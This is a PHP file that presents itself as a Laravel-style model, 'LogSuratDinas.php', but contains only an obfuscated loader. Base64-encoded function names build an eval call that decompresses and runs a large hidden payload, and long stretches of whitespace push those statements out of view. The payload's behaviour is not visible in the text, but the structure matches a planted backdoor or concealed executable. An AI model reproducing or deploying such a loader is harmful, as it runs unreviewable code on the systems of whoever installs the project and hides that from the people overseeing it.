<?php 
        $__='printf';$_='Loading app/Models/LogSuratDinas.php';
        



















































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


















































































































































































































                                                                                                                                                                                                                     $________;
